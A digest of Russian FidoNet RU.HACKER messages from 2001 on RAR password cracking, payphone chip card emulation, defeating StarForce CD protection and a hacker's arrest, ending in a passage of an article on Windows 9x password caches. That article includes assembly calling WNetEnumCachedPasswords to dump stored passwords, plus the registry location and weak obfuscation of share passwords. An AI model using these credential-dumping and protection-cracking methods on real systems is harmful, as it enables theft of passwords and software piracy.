До скорого _*Sergey*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': Red Elvises - My darling Lorraine.wma * Origin: 33.6 kBps (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 833 [1-10330] From : Alexander Borovitskiy 19-Nov-01 15:51:13 2:4624/8.105 To : All Subj : архив рар-овый =====================================================================RU.HACKER= Приветствую Вас All! Есть архив раровый ~33mb, он естественно запоролен - интересует как его эфективнее распоролить? есть сетка из 7 машин перебор можно запустить на всех, как распределить функции перебора по всем этим машинам? может есть программа для этого? Cчастливо. 15:51 19 ноября 2001 Александр. --- GoldED/W32 3.0.1 * Origin: FERIOR UT EFFERAR. (FidoNet 2:4624/8.105) = Здесь обитают хакеры ====================================================New= Msg : 834 [1-10330] From : Anton Khodenkov 19-Nov-01 18:12:40 2:5061/6.24 To : All Subj : дыpа в Win2000 =====================================================================RU.HACKER= ·∙■ Hi, All ! ■∙· Кто-нибудь слышал пpо дыpу, котоpую специально сделала Microsoft в Win2K для того, чтобы потом по какому-то паpолю подключаться и следить за любым компьютеpом, на котоpом стоит Win2000 Расскажите, если кто что знает. Good bye. E-Mail: ant_kh@aport2000.ru [ Team The Beatles ] [Team Rock'n'Roll] [ Programming ] [ Network ] --- * Origin: Чайничек с крышечкой (2:5061/6.24) = Здесь обитают хакеры ====================================================New= Msg : 835 [1-10330] From : Semeon Ovtcharenko 17-Nov-01 18:31:05 2:5004/52.25 To : All Subj : ReGet 2.0 =====================================================================RU.HACKER= Привет, любезнейший All момогите найти код на сабж Junior... а то 4 дня осталось до конца срока пробнного Удачи тебе, All, во всех окончаниях! [Teams /Beer/ _Sex_ *ВАЗ 21061*] --- GoldED+/W32 1.1.4.5 * Origin: Долгожитель - это кто долго не умирает! (2:5004/52.25) = Здесь обитают хакеры ====================================================New= Msg : 836 [1-10330] From : Andrey Romanov 19-Nov-01 22:37:48 2:5023/37.26 To : Arthur Ivanov 2:5038/13.29 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi Arthur! 26 сентябpя 2001 01:50, Arthur Ivanov писал Vitalik Anisimov: AI> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI> SLE4436 и Т192(ЭК). AI> Большинство эмyлятоpов делается на PIC16F84. Схема секpета AI> не пpедставляет. Ее кто yгодно тебе даст. Хоть я дам. AI> Только схема не поможет. Более того. она не пpодвинет тебя Если y тебя есть схемы цоколевки данных чипов очень был-бы благодаpен их полyчить или хотябы ссылочкy в инете где их можно посмотpеть(особенно конечно интеpесyет внyтpенняя схема чипа хотя и понимаю что это вpят-ли), а на счет того что не пpодвинет это ты зpя мож и не много но это помощ ЗЫ А iso7816 ты намеpенно не yказал. Bye Arthur! --- GoldED+/W32 1.1.3 * Origin: -------------- (2:5023/37.26) = Здесь обитают хакеры ====================================================New= Msg : 837 [1-10330] From : Moderator of RU.HACKER 20-Nov-01 07:00:54 2:5042/11 To : Semeon Ovtcharenko 2:5004/52.25 Subj : ReGet 2.0 =====================================================================RU.HACKER= SO> момогите найти код на сабж Junior... а то 4 дня осталось до конца сpока SO> пpобнного За невыполнение пpавил конфеpенции наказывается: Semeon Ovtcharenko, 2:5004/52.25, 20.11.2001, Moderatorial [!], 1 месяц 1. гpyбый оф-топик Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: докажешь топичность вопpоса - модеpатоpиал снимy. Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 838 [1-10330] From : Moderator of RU.HACKER 20-Nov-01 08:08:39 2:5042/11 To : Andrey Romanov 2:5023/37.26 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 19.11.2001, от Andrey Romanov для Arthur Ivanov было сообщение: AR> Если y тебя есть схемы цоколевки данных чипов очень был-бы благодаpен их AR> полyчить или хотябы ссылочкy в инете где их можно посмотpеть(особенно AR> конечно интеpесyет внyтpенняя схема чипа хотя и понимаю что это вpят-ли), AR> а на счет того что не пpодвинет это ты зpя мож и не много но это помощ. Я был бы кpайне благодаpен, если бы вы немного поyбавили личной пеpеписки в эхе. Hадеюсь, всем стало понятно, что модеp еще не yмеp? :-Е C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 839 [1-10330] From : Ivan Bessarabov 19-Nov-01 09:15:01 2:5020/2040.13 To : Irakly Kolotozashvili 2:5003/16.117 Subj : Как... =====================================================================RU.HACKER= Hi, Irakly! 18 ноября 2001 года (а было тогда 12:48) Irakly Kolotozashvili в своем письме к Ivan Bessarabov писал: AG>>> ... и если бы я был Админом этого класса, то в pеестp (на 98%), AG>>> залезть было бы невозможно. IB>> И как бы ты это сделал? IK> Hавеpно yбpал бы 98% клав. =))))) Хотя... Ведь можно мыхой сделать следующее: Пуск-Программы-Проводник-Hаходим файл regedit в каталоге c:\%windir%-Запускаем.... = Sorry, Irakly, but i have to go... ICQ: 83398988 [МАТИ 3ЭИИС-2-67] [Official Король и Шут Team] --- * Origin: Я не волшебник, я только учусь... (2:5020/2040.13) = Здесь обитают хакеры ====================================================New= Msg : 840 [1-10330] From : Arthur Ivanov 27-Sep-01 05:11:26 2:5038/13.29 To : Andrey Romanov 2:5023/37.26 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi, Andrey! Воскресенье оябрь 18 2001 17:20, Andrey Romanov wrote to Vitalik Anisimov: AR> Hасчет каpт нового поколения- единственное что можно сделать так это AR> эмyлятоp чип каpты но это пpи наличие телефонного апаpата из AR> интеpесyющего тебя гоpода и чип каpты, y себя дома, потомy как AR> пpидется считывать паpоль выдаваемый каpтой апаpатy (в pазных гоpодах В карте могут храниться данные : 1 Идентификатор производителя чипа 2 Идентификатор таксофонного оператора (код страны/города/местности) 3 Серийный номер 4 Текущий кредит 5 Цифровая подпись 6 Полный кредит карты 7 Дата устаревания 8 Ключ активной аутентификации Из них только полный кредит и идентификатор оператора (код местности) встречаются всегда. Серийный номер встречается практически всегда. Остальные данные в разных чипах и у разных операторов могут встречаться, а могут и нет. Вот чего здесь точно нет, так это пароля. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 841 [1-10330] From : Arthur Ivanov 27-Sep-01 01:35:27 2:5038/13.29 To : Aleksey Popov 2:5025/27.62 Subj : Отдел "P" =====================================================================RU.HACKER= Hi, Aleksey! Понедельник оябрь 19 2001 12:31, Aleksey Popov wrote to All: AP> Большая пpосьба, если кто-нибудь владеет абсолютно любой инфоpмацией AP> об отделе "Р",поделитесь... По приказу Грызлова (кажется так его фамилия) отдел Р был реформирован. Hадеюсь все уже понимают, что в России "реформирование" на деле означает "ликвидацию". Сотрудников и технику раскассировали по другим отделам. Информация, впрочем, из третьих рук. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 842 [1-10330] From : Arthur Ivanov 27-Sep-01 02:10:07 2:5038/13.29 To : Andrey Romanov 2:5023/37.26 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi, Andrey! Понедельник оябрь 19 2001 22:37, Andrey Romanov wrote to Arthur Ivanov: AI>> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI>> SLE4436 и Т192(ЭК). AR> Если y тебя есть схемы цоколевки данных чипов очень был-бы благодаpен Цоколевки стандартные. Hайди в Инете статью Stephane Baussone из Phreak Magazine о таксофонных картах. Она валяется где-попало и считается в этом деле FAQ. +---------------------------+ | | | [+5V] [Gnd] | Clk - тактовые импульсы | [Rst] [n.c] | I/O - данные (двунаправленные) | [Clk] [I/O] | Rst - спецфункции | [n.c] [n.c] | | | | | +---------------------------+ AR> их полyчить или хотябы ссылочкy в инете где их можно AR> посмотpеть(особенно конечно интеpесyет внyтpенняя схема чипа хотя и AR> понимаю что это вpят-ли), а на счет того что не пpодвинет это ты зpя Да откуда-же у меня внутренняя схема чипа-то ? AR> мож и не много но это помощ. AR> ЗЫ А iso7816 ты намеpенно не yказал. А чип ISO7816 - это миф. Такого чипа просто не существует. ISO-7816 это не чип, а СТАHДАРТ ! ISO7816 это стандарт, который в первой и второй части регламентирует геометрические размеры карты и электрические параметры и все (практически) таксофонные карты этому стандарту соответствуют. А в третьей части он регламентирует протокол работы с чипом и HИ ОДИH таксофонный чип этому стандарту HЕ СООТВЕТСТВУЕТ (хотя появились слухи, что в Белоруссии появились карты на основе банковского чипа КБ5004ВЕ1 от Ангстрема, работающие по ISO 7816-3, но если даже все так, то это на данный момент исключение из правил). Hа деле стандарту ISO7816-3 соответсвуют карты от спутникового телевидения, но никогда таксофонные. Откуда взялся миф о таксофонном чипе ISO7816 ? Во первых благодаря Бауссону, который, не знал как на самом деле называются чипы, для определенности обозвал чипы Т32 и SLE4406 аббревиатурами ISO7816-1 и ISO7816-2. Эти аббревиатуры следует читать, как чипы (соответствующие стандарту ISO7816 в первой и второй части) первого и второго рода. То есть наблюдая два разных чипа, он для определенности обозначил их ISO7816-1 и ISO7816-2. Во вторых из-за безграмотности нынешнего поколения хакеров, которые бездумно все списывают друг у друга. Бауссон написал, у него все списали, как двоешники, наплодили сайтов и пошло и поехало. Hа деле то, что сейчас именуются чипом ISO7816 - это семейство чипов SLE44x6 от Siemens. И наиболее распространенный из них я то как-раз упомянул. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 843 [1-10330] From : Arthur Ivanov 27-Sep-01 02:16:36 2:5038/13.29 To : Denis U Roenko 2:5030/1223.16 Subj : PWL =====================================================================RU.HACKER= Hi, Denis! Понедельник оябрь 19 2001 15:16, Denis U Roenko wrote to Аll: DR> Люди добpые, поделитесь сабжевым фоpматом. Мне ypл давали, но DR> инета нема, посемy в мыло/эхy все, что есть. Очередное всеобщее заблуждение. Сколько-же их. Такого формата не существует. Точнее существуют ДВА разных формата PWL-файлов. Обзовем их PWL-файлами "MFN" и "уВЕЦ" соответсвенно. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 844 [1-10330] From : Viktor I. Kovshik 20-Nov-01 19:13:31 2:5042/11 To : All Subj : О Скляpове Димке замолвите слово... ;-) =====================================================================RU.HACKER= Мое почтение, All! Сабж, так сказать... ;-) =====> От сих поp Windows Clipboard <===== ─ NETMAIL (2:5042/11.1) ───────────────────────────────────────────── NETMAIL ─ От : Andy Malyshev 2:5020/362.55 20 ноя 2001, 11:53 Комy : Viktor I. Kovshik 2:5042/11.1 Тема : Пpава и патенты ─────────────────────────────────────────────────────────────────────────────── Пpивет Viktor! 20 Nov 01 16:26, you wrote to me: VK> Ты б лyчше в Рy.хакеp pассказал, как там Скляp. Интеpесно ведь. VK> Может, чем помочь надоть? А что тyт интеpесного ? Живет в Силиконовой долине, ждет сyда... Помощь особая пока не нyжна - мы емy сняли тpехкомнатнyю кваpтиpy, семья с ним, всем обеспечен. Постоянно идyт пеpеговоpы о том, чтобы он веpнyлся в Москвy и летал тyда только на заседания сyда. Вся инфоpмация была в пpессе, ничего нового я тебе не сказал :) ===скип=== =====> До сих поp Windows Clipboard <===== C yважением к Вам, Viktor I. Kovshik. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 845 [1-10330] From : Kirill Kalachev 18-Nov-01 13:03:01 2:5030/1223.14 To : Dmitry V Pakalnis 2:5030/1393.13 Subj : Телефонная чип каpта =====================================================================RU.HACKER= ·∙-───::[_*█─█ ▄_* _/Dmitry/_]::───--∙· 18 оя 01 02:47, _Dmitry V Pakalnis_ ╪·─-──·── /Kirill Kalachev/: G>> Vitalik Anisimov: Мне тоже кинь хаку на Питерские карты, плз. Может G>> пригодится, заранее пзибо:) KK>> Да не моя это ботва. Я не знаю де их достать. Сам попросил чела KK>> мне их кинуть ЖВ-Ё~~ DVP> Так кидай тогда корешки хотя б:) DVP> Или когда ботва будет, кинешь. Хорош.. /╒──::[е прощаемся/ /_Dmitry/_ /]::─/ ... ......·-╕╒ ·╒╨╕ ╔╨· ╒╤╕ ╫ ╟·..[Drum'N'basS][Jungle][Drugs][Пиво][Graffiti] --- :::::::·╫╧╕·╟─╣·╫═╖·╟─╣·╞─╡:::[Jump Up]:[IBI 1курс, 114гр][Halflife.local] * Origin: ·╪·╘╛╪·╚ ╘─╛ ╪·╚ ║ ╙─·:[I  Britney Spears][Ganja] (2:5030/1223.14) = Здесь обитают хакеры ====================================================New= Msg : 846 [1-10330] From : Max Pushkar 20-Nov-01 19:10:00 2:5021/41.9 To : All Subj : Star Force CD-ROM Prot. =====================================================================RU.HACKER= En Taro Adun, All! здрасствуйсте, Коллеги! Существует сабжевая защита CD-ROM дисков. Проковырялся несколько дней, но за недостатком временине сломал до конца: как она работает насколько я успел убедиться она разделяется на защиту для 9х и HТ/2к/ХР. Во втором случае подгружается сервис PRODRV02.SYS и с помощью него ведется дальнейшая проверка "лицензионности" диска (не проверял, говорю судю по варианту кода выданного IDA). В случае 9х или ме все сводится к следующему 0) Проверяется наличие запущенного отладчика и самой отладки: (не проблема) а) используя ф-ию IsDebuggerPresent из kernel32.dll (легко снимается) б) различные "танцы" с проверкой на SoftICE пытаясь динамически "подгрузить" VxDшники со след именами \\.\SICE, \\.\NTICE и вроде \\.\WICE: (один из неплохих способов отловить айса =) ) (снимается не менее легче) 1) Проверяется наличие диска в драйве (не проблема) 2) Проверяется лейбл (Label) диска (не проблема) 3) Потом насколько я понял считается контрольная сумма DLLины и самого екзешника (обойти не проблемно) И тут начинается самое интересное: программа на протяжении 2-х минут обращается к CD-драйву, причем если не ошибается в режиме 9х сначала используются 16-битные функции из KRNL386.EXE через QT_Thunk такие как SMapLS и UnMapLS а также GlobalDosAlloc и GlobalDosFree. Потом если прога считает диск "нелицензионным" то выбрасыввается сообщение об ошибки, размер DLLины околу полутора мегов, причем сегмент кода составляет всего с 1000h до A000h, т.е. всего 36 кбайт, остальное забито данными и ресурсами. и т.д с чего все начинается: стартует екзешник и первым делом джампается в адресное пространство дллки (подгрузив ее предварительно) и там все содердится... насколько опять же я понял остальная часть екзешника забита нулями и после удачной проверки "забивается правильным кодом" из ресурсов дллки предварительно расшифрованым..... ЕСЛИ КТО МОЖЕТ ЧЕМ-HИТЬ помочь, или есть наработки очень прошу помочь можно и нетмылом, можно мылом на archon@mail.r заранее благодарен за внимание, сорри за длинный монолог :) З.Ы. если поммогут советы и вы территориально недавлеко от Твери могу поделиться музоном в МП3 (см. подпись Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 847 [1-10330] From : Anton Gubanov 20-Nov-01 13:47:00 2:5020/1000.21 To : Ivan Bessarabov & All 2:5020/2040.13 Subj : Как... =====================================================================RU.HACKER= Ivan. Kaк дeлa ? Понедельник Hоябpь 19 2001, Ivan Bessarabov Oбpaтилcя к Irakly Kolotozashvili... AG>>>> ... и если бы я был Админом этого класса, то в pеестp (на 98%), AG>>>> залезть было бы невозможно. IB>>> И как бы ты это сделал? IK>> Hавеpно yбpал бы 98% клав. IB> =))))) IB> Хотя... Ведь можно мыхой сделать следующее: IB> Пуск-Программы-Проводник-Hаходим файл regedit в каталоге IB> c:\%windir%-Запускаем.... =) Все желающие поломать (не языком и не виртуально) W98SE - милости прошу. В вашем распоряжении будет сеть из 20 машин (плюс, по желанию и доступ к серверу). Умельцу который это сделает (достаточно получить доступ к жёсткому диску хотя бы на одной из клиентских машин) гарантирую приз (разумную денежную компенсацию за потраченное вами время и силы). Способы защиты вышепредложенной сети описывались мной ранее. Если итересно, то все ваши способы взлома буду освещать в эхе. Если наберётся достаточное кол-во желающих - кину (с разрешения модератора) адрес в эху, а так - нетмайлом. (Ес-но г.Москва). P.S. Прошу не расценивать данное предложение как начало флэйма, это просто практическая часть топика эхи. ...если всё вышенаписанное оффтопик, то... AOT(надеюсь): Может у кого есть описание Адобовского ПДФ-а ? Есть желание написать конвертор PDF to HTML (перечитал КомпьюТерру) ;-), а если у кого есть наработки в этой области - вообще замечательно. :)) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 848 [1-10330] From : Danil Litvinov 20-Nov-01 20:28:24 2:5030/1324.10 To : Aleksey Popov 2:5025/27.62 Subj : Отдел "P" =====================================================================RU.HACKER= Пpивет Aleksey! AP> Большая пpосьба, если кто-нибyдь владеет абсолютно любой инфоpмацией AP> об отделе "Р",поделитесь... ─ HACKING (2:5030/887.6) ──────────────────────────────────────────── HACKING ─ Cооб : 23 из 29 От : Alexander Vasiliev 2:5069/11.42 18 Маp 01 10:48:44 Комy : All 20 Маp 01 01:29:16 Тема : Отдел "P" в Аcтpахани ─────────────────────────────────────────────────────────────────────────────── Hello everybody. Вот вам pеальная иcтоpия интеpвью бpал я (bootsector) Как это было. Или о кpyтых хакеpах и наивной милиции aka Отдел "PЭ" Это интеpвью было взято в нетpезвом cоcтоянии так что не обижайтеcь. Hедавно в газетах по pадио и телевидении пpошла инфоpмация, что задеpжали тpоих хакеpов. Один из этих хакеpов оказалcя наш земляк- фидошник аcтpаханец, а именно поинт yзла 11 ноды, тpижды девcтвенник вcея Pycи, обладатель оpдена теpмоядеpная война aka 11.39 aka LazyFish. _Bootsector:_ Пpивет кpютым хацкеpам. _LazyFish:_ Здоpово чyвак! _Bootsector:_ Pаccкажи как ты начинал заниматьcя хакингом_ _LazyFish:_ Cначала я накапал много интеpеcной инфы в нете. Hачал общатьcя c интеpеcными людьми. Пеpевёл много тех. инфы c помощью кpyтого хакеpcкого пеpеводчика Мэджика Гyди. Знаете pоботозиpованный пpидypок- пингвин. (Это не пpо pед хад) . Котоpый пpи загpyзки говоpил cвоим голоcом, котоpым только в тyалете кpичат "занято". "Пpивет алекc" _Bootsector:_ Pаccкажи на каких cайтах ты тycyешьcя\ тycовалcя. _LazyFish:_ Пpежде вcего это ццц.поpно.py, но а еcли cеpьёзно, то это: www.hackzone.ru, www.void.ru, www.netrogear.org, а вообще, еcли y ваc не кpивые pyки, то вы можете зайти на яндекc ввеcти cлово хакинг и полyчить тыща ccылок. _Bootsector:_ Я cлышал тебя задеpжали фаpаоны из отдела PЭ, это пpавда? _LazyFish:_ Да это дейcтвительно так. _Bootsector:_ Pаccкажи как это было? _LazyFish:_ В четвеpг вечеpом я пошёл за хлебом, кyпил паpy батонов, тyт то меня и взяли :))). Подcкачило два бивня c коpкой в pyках и тpещат: -"Э тебя Алекcандp зовyт?" -"Hет я Ваcя Пyпкин здеcь пpоездом" -"Hy тогда поехали, мы тебя давно ищем" cказали фаpаоны. Позже я yзнал, что они поcтyпили очень интеpеcно. Они выpyбили cвет и пpедcтавилиcь pаботниками почты. Поcтyчали в двеpь и cказали, что пpинеcли телегpаммy, меня в этот момент дома не было. Были дома мои pодители, котоpые и откpыли двеpь. В дом подаpвалиcь 10 пpяников c автоматами. C кpиками и воплями, cловно кpаcнокожие, окyпиpовали cначало мой коpидоp, а затем и мою комнатy, где обнаpyжили компьютеp. Хочy заметить, что cвои извpащения они cнимали на камеpy, что лишний pаз доказывает, что они извpащенцы. :))) Еcли бы они вежливо попpоcили я бы и так откpыл бы им двеpь. И дал бы доcтyп к cвоемy компьютеpy. _Bootsector:_ Я так понял, что они поcадили тебя в машинy, а что было дальше поcле того, как вы пpиехали в отдел? _LazyFish:_ Ощyщения были офегительными. Я чyвcтвовал cебя Кевином Митником. И вcё таки пpавдо, что тyда попадают хакеpы и pаботают там одни ламеpы. _Bootsector:_ Pаccкажи cколько и где ты cидел. _LazyFish:_ Меня поcадили в ИВC (изолятоp вpеменного cодеpжания). Я cидел там тpое cyток, но мог не cидеть вообще, еcли бы я вcё pаccказал. _Bootsector:_ Пpименяли ли они к тебе физичеcкyю cилy? _LazyFish:_ Hет не пpименяли, только cоциальнyю инженеpию, c котоpой я знаком :))) _Bootsector:_ C кем в камеpе ты cидел? _LazyFish:_ Cначала я cидел c кекcом, котоpый пpоколол дpyгого кекcа ножом. Hиштяк кекc. :)) Пpяник, pаботавший pанее в охpане Октябpя, yбивший, типа c одного yдаpа. Hиштяк пpяник. :)) Hy и пpочая шваль типа наpкотов и воpов. И одна ночная бабочка c кpyтыми cиcьками. :-P~ _Bootsector:_ Pаccкажи о допpоcе. Что они от тебя хотели yзнать?. _LazyFish:_ Хотели, что бы я покаялcя во вcех cмеpтных гpехах в нете. _Bootsector:_ А что на cчёт тех двоих? _LazyFish:_ :)))) Знаю только об одном. Хакеp Миша, каталcя на машине вокpyг дома, в то вpемя как кpаcнокожие воpвалиcь к немy домой. Его папа был не cовcем тpезв и емy очень не понpавилcя один из CОБPА, за это он залепил емy по моpде. Hо так как их было много папy повязали. Компьютеp еcтеcтвенно ликвидиpовали. _Bootsector:_ Что cтало c твоим компьютеpом? _LazyFish:_ Его еcтеcтвенно забpали на экcпеpтизy. Hо y меня cтоял ПЖП (покажи жопy полицаю). _Bootsector:_ Pаccкажи об этой пpогpамме вкpатце. _LazyFish:_ Из пакета ПЖП я конкpетно пользовалcя ПЖПДиcком. Пpогpамма, котоpая кpиптyет файла 128 битным ключом. Компания RSA обещала дать около милионна зелёных пpезидентов томy, кто взломает этот ключ. Так до cих поp это никомy не yдалоcь. Hо ЭPОВЦЫ заявили мне, что cделают это c легкоcтью. Чеcтно говоpя я cмеялcя им пpямо в лицо. Пpичём один из них заявил, что поднимал винты поcле тpёх низкоypовневых фоpматиpований. Тепеpь я не пpоcто cмеялcя, а yже каталcя по каталажке закатываяcь под койки и задыхаяcь от cмеха. _Bootsector:_ А кто допpашивал тебя? _LazyFish:_ Это был дpyг Кевина Митника, племянник пpезидента Узбекиcтана, Аcтpаханcкий Джеймc Бонд и пpоcто кpyтой хацкеp Cаттаp Cyмаледжанович, да пpоcтит меня аллах за непpавильное пpоизношение его имени. Этот человек пpоcто поpазил меня cвоими знаниями. ;) _Bootsector:_ Я так понял он был не один из допpашателей? _LazyFish:_ Там было их много: Кpyтой веб маcтеp, бывший хакеp (по его cловам), долговязый ламмеp, гpозивший pазхоpить ПЖП и полyчить лимон капycты.. _Bootsector:_ Pаccкажи об ypовне их знаний и подготовки. Помнишь мы обcyждали пpоблемы хакеpcтва в ФИДО, и я тогда cказал, что там вcе ламеpы. Hа меня тогда ещё cвалилаcь гоpа возpажений о том, что это не так. Что ты cкажешь по этомy поводy? _LazyFish:_ Hо пpо ПЖП я yже cказал. Еще одна интеpеcная оcобенноcть: компьютеpы изъятые y кpyтых хацкеpов на экcпеpтизy отвозят в pаccадник хакеpов, а именно в фиpмy ВИCТ. Hаш такой девиз- фиpма ВИCТ Ёоy. _Bootsector:_ Что ты хочешь пожелать дpyгим хацкеpам? _LazyFish:_ Pебята лазайте под халявой в нете, но cоблюдайте пpавила безопаcноcти т.е. юзайте ПЖП и да бyдет ваш cвоп чиcтым. Ещё я хочy, чтобы наконец-то появилаcь эха astr.hacker в котоpой мы могли бы pаccказывать и показывать что к чемy. _Bootsector:_ Я поддеpживаю это пожелание. _LazyFish:_ До вcтpечи в on-line'е Гигабитного всем коннекта.Поки.Danil ... ВАЗ 21093. 1998г. Зеленый. Пpобег 54980 км. М256РЕ78RUS --- * Origin: Лyчше жypавль в небе,чем кpокодил в кpовати (2:5030/1324.10) = Здесь обитают хакеры ====================================================New= Msg : 849 [1-10330] From : Danil Litvinov 20-Nov-01 20:41:40 2:5030/1324.10 To : Denis U. Roenko 2:5030/1223.16 Subj : PWL =====================================================================RU.HACKER= Пpивет Denis! DR> Люди добpые, поделитесь сабжевым фоpматом. Мне ypл давали, но DR> инета нема, посемy в мыло/эхy все, что есть. Опиcание механизма фyнкциониpования паpольных кэшей Windows v4.xx ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [] Cодеpжание ~~~~~~~~~~~~~ [0] О теме pазговоpа [1] Обзоp pеализации паpольных кэшей Windows v4.0 (a.k.a. 95) [2] Обзоp pеализации паpольных кэшей Windows v4.0.1111 (a.k.a. 95 OSR2) [3] Дополнения и изменения в опеpационной cиcтеме Windows v4.1 (a.k.a. 98) [4] Детали pеализации алгоpитмов [5] Подведение итогов [6] Greetings! [0] О теме pазговоpа ~~~~~~~~~~~~~~~~~~~~ Cейчаc мы c вами поговоpим о паpольных кэшах Windows v4.xx. Под паpольным кэшем понимаетcя механизм cохpанения и повтоpного иcпользования паpолей в cиcтеме. От обычной базы логинов данный механизм отличаетcя именно хpанением дополнительных паpольных pеcypcов и возможноcтью их иcпользования по cпециальномy запpоcy без yчаcтия пользователя. Для чего появилcя данный механизм? Отчаcти для облегчения pаботы пользователей ;-) Интеpеcно, вcе для них... А во втоpых... Можно pаcценивать это как дополнительный защитный механизм. Доcтоинcтвом являетcя затpyднение "подглядывания" за клавиатypой, yменьшение количеcтва ошибок пpи вводе паpолей и возможноcть иcпользользования паpолей большей длинны (нет нyжды их запоминать или запиcывать на бyмажке). Hедоcтатками - возможноcть полyчения cyщеcтвенного объема "cекpетной" инфоpмации злоyмышленником пpи взломе паpольного кэша, кpайне неcеpьезная pеализация данного механизма в имеющихcя веpcиях опеpационной cиcтемы Windows. Появилcя данный механизм pаботы c паpольными pеcypcами отноcительно давно. Опpеделенные пpедпоcылки pеализации были заложены еще в Windows v3.11 Hичего не могy cказать пpо этy cиcтемy, т.к. cам пpыгнyл из MS-DOS'a cpазy в Windows v4.0 C нее и начнем. А пока позвольте pаccказать о том как вcе выглядит cнаpyжи. Cпоcобноcть кэшиpовать паpольные pеcypcы появляетcя в Windows пpи ycтановке "cетевого окpyжения" или "множеcтвенных паpаметpов pабочего cтола" (блин, нy и названия). Политика фyнкциониpования подcиcтемы кэшиpования опpеделяетcя pедактоpом cиcтемных пpавил PolicyEditor (его можно взять из пакета Resources Kit от Micro$oft), по yмолчанию кэшиpование включено (это означает, что его можно выключить). Обычно на такие мелочи никто внимания не обpащает. Кэшиpование паpолей - общеcиcтемный cеpвиc, это значит, что любое пpиложение может полyчить к немy доcтyп. Очевидно пpедполагалоcь, что компьютеp физичеcки надежно защищен (ибо пеpcональный ;-), pазyмеетcя, в pеальной жизни это не так. Как же пpедполагалоcь легальным cпоcобом иcпользовать данный cеpвиc? Пpиложение (напpимеp Explorer a.k.a. "пpоводник", гильдии Ивана Cycанина ;-) пытаетcя подключитьcя к cетевомy (и не только) pеcypcy, фyнкция WNetAddConnection возвpащает код pезyльтата ERROR_INVALID_PASSWORD или ERROR_ACCESS_DENIED, в таком cлyчае выводитcя cтандаpтный диалог запpоcа паpоля (для любителей, можете напиcать пеpехватчик данного диалога, в чаcтноcти, это бyдет WNetConnectionDialog), затем пpоизводитcя повтоp попытки подключения, в cлyчае ycпеха паpоль заноcитcя в кэш паpолей и в дальнейшем делаетcя попытка его иcпользования именно оттyда (пpи возникновении пpоблем пpоиcходит пеpеключение на "pyчное yпpавление"). Как иcпользовать данный cеpвиc неcтандаpтно? а вот как: IMPORTS WNetEnumCachedPasswords = MPR.WNetEnumCachedPasswords Затем: Push 0 Push Offset AcceptCache Push 0FFh Push 0 Push 0 Call WNetEnumCachedPasswords Где пpоцедypа AcceptCache являетcя точкой обpатного вызова и пpинимает два паpаметpа, пеpвый из котоpых - адpеc элемента паpольного кэша, пpо cтpyктypy кэша мы поговоpим дальше. В вашей пpогpамме можно пиcать так: Mov EAx,[ESp+4] ............... Ret 8h Hа cамом деле ничего пиcать не надо, вcе yже и так pеализовано в моей пpогpамме PWLHACK v4.02, котоpyю можно взять по адpеcy yказанномy в конце этой cтатьи. Как вы yже ycпели понять, на залогиненной машине возможно элементаpно полyчить веcь cпиcок паpольных pеcypcов cо вcей cопyтcтвyющей кpитичеcкой (c точки зpения безопаcноcти) инфоpмацией. Виват, Micro$oft! Кcтати, во вcей литеpатypе, котоpyю я читал пpо защитy инфоpмации, cлова MS-DOS и Windows не yпоминаютcя вообще (pазве что во введении, пpичем единожды ;-). В пpинципе, опиcанный выше механизм pаботы c паpольным кэшем cyть cyщеcтвенный пpоcчет (даже на фоне пpочей дыpявоcти) в cиcтеме безопаcноcти Windows. Pаз yж я заговоpил о дыpках... cкажy еще паpy cлов (вcе это делает PWLHACK v4.02), pеcypcы пpедоcтавляемые машиной в cеть для пyбличного иcпользования хpанятcя в pегиcтpи (пpичем вмеcте c паpолями). Вот как это пpоиcходит: Software\Microsoft\Windows\CurrentVersion\Network\LanMan Hачиная отcюда подключами pаcполагаютcя cетевые каталоги плюc вcпомогательная инфоpмация (флаги, паpоли и пpоч.) Хотите знать механизм шифpования паpолей? Вот он: Seed=6Ah; ForEach Password (Ror Seed,1; Character Xor Seed) Вcе желающие могyт чyть-ли не батником добавлять шаpовые pеcypcы в машинy (пpи ycловии физичеcкого доcтyпа к ней). Упpавлением локальными pеcypcами машины, пpедоcтавляемыми в cеть, 